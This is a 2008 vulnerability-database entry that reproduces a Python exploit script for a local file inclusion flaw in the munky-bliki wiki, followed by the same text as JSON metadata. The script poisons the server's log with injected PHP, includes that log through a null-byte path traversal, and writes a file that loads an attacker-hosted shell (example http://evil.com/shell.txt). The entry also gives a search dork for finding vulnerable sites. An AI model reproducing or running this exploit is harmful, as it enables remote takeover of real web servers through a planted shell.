ID SECURITYVULNS:DOC:20374
Type securityvulns
Reporter Securityvulns
Modified 2008-08-18T00:00:00
Description
!user/bin/python
-- coding: cp1256 --
munky-bliki Lfi
AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))
Our Site : Http://IRCRASH.COM
IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)
Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz
DORK : "Copyright © 2004 Dovid Kopel"
[Bug]
http://Site/?zone=file.type%00
[Note]
By this exploit u can create a shell on valun site ;)
Site : Http://IRCRASH.COM
################################ TNX GOD
import httplib,urllib
site=raw_input('Site [Ex www.r3d.com]: ')
path=raw_input('Path [Ex /munky]: ')
shell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')
print "[]Powered by : R3d.W0rm - r3d.w0rm@yahoo.com"
conn=httplib.HTTPConnection(site)
print "[]Connected to " + site
print "[]Sending shell code ..."
conn.request('GET',path + "/?zone=<?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'<?php%20include%20\\'" + shell +
"\\';?>');fclose($fp);?>")
print "[]Running shell code ..."
data=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')
print "[]Shell created"
print "[]" + site + path + '/r3d.w0rm.php'
{"id": "SECURITYVULNS:DOC:20374", "bulletinFamily": "software", "title": "munky-bliki lfi", "description": "#!user/bin/python\r\n# -*- coding: cp1256 -*-\r\n#####################################################################################\r\n#### munky-bliki Lfi ####\r\n#####################################################################################\r\n# #\r\n#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #\r\n#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) #\r\n#Our Site : Http://IRCRASH.COM #\r\n#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) #\r\n#####################################################################################\r\n# #\r\n#Script Download : http://kent.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz\r\n# #\r\n#DORK : "Copyright \u00a9 2004 Dovid Kopel" #\r\n# #\r\n#####################################################################################\r\n# [Bug] #\r\n# #\r\n#http://Site/?zone=file.type%00 #\r\n# [Note] #\r\n# #\r\n#By this exploit u can create a shell on valun site ;) #\r\n# #\r\n#####################################################################################\r\n# Site : Http://IRCRASH.COM #\r\n###################################### TNX GOD ######################################\r\nimport httplib,urllib\r\nsite=raw_input('Site [Ex www.r3d.com]: ')\r\npath=raw_input('Path [Ex /munky]: ')\r\nshell=raw_input('Shell [Ex http://evil.com/shell.txt]: ')\r\nprint "[*]Powered by : R3d.W0rm - r3d.w0rm@yahoo.com"\r\nconn=httplib.HTTPConnection(site)\r\nprint "[*]Connected to " + site\r\nprint "[*]Sending shell code ..."\r\nconn.request('GET',path + "/?zone=<?php%20$fp=fopen('r3d.w0rm.php','w%2B');fwrite($fp,'<?php%20include%20\\'" + shell +\r\n"\\';?>');fclose($fp);?>")\r\nprint "[*]Running shell code ..."\r\ndata=urllib.urlopen('http://' + site + path + '/?zone=../logs/counts.log%00')\r\nprint "[*]Shell created"\r\nprint "[*]" + site + path + '/r3d.w0rm.php'\r\n\r\n\r\n", "published": "2008-08-18T00:00:00", "modified": "2008-08-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20374", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 8, "enchantments": {"score": {"value": 1.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9228"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9228"]}]}, "exploitation": null, "vulnersScore": 1.2}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645478180}}
{}
